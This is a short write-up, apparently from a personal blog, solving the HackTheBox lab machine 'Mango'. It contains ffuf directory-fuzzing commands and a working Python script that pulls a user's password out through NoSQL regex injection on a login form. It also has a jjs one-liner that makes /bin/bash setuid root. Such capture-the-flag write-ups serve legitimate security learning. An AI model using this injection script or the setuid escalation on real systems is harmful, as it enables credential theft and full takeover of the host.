Post

Mango @ HackTheBox

Mango is a 30-point linux machine on hackthebox that involves a NoSQL-Injection which allows to obtain user passwords from a mongo database. For root we find the tool jjs, which is owned by root and has the setuid bit set. This allows us to run custom java code as root.

Notes

Fuzzing the webroot:

1
2
3
~/tools/ffuf/ffuf -w ~/tools/SecLists/Discovery/Web-Content/raft-large-files.txt -u http://staging-order.mango.htb/FUZZ -fc 403
~/tools/ffuf/ffuf -w ~/tools/SecLists/Discovery/Web-Content/raft-large-directories.txt -u http://staging-order.mango.htb/FUZZ -fc 403
~/tools/ffuf/ffuf -w ~/tools/SecLists/Discovery/Web-Content/raft-large-directories.txt -u http://staging-order.mango.htb/vendor/FUZZ -fc 403

Installed.json

1
http://staging-order.mango.htb/vendor/composer/installed.json

MongoDB data extraction:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/usr/bin/env python3
import re
import requests
import string

chars = string.ascii_letters + string.digits + string.punctuation
password = ""
url = "http://staging-order.mango.htb/"
done = False

while not done:
    done = True
    for c in chars:
        data = {
            "username": "mango",
            "password[$regex]": f"^{re.escape(password+c)}.*$",
            "login": "login"
        }
        r = requests.post(url, data=data, allow_redirects=False)
        if r.status_code == 302:     
            done = False       
            password += c
            print(f"[+] Found {c}")
print(f"[+] Password: {password}")

Jjs:

1
Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /bin/bash').waitFor()
This post is licensed under CC BY 4.0 by the author.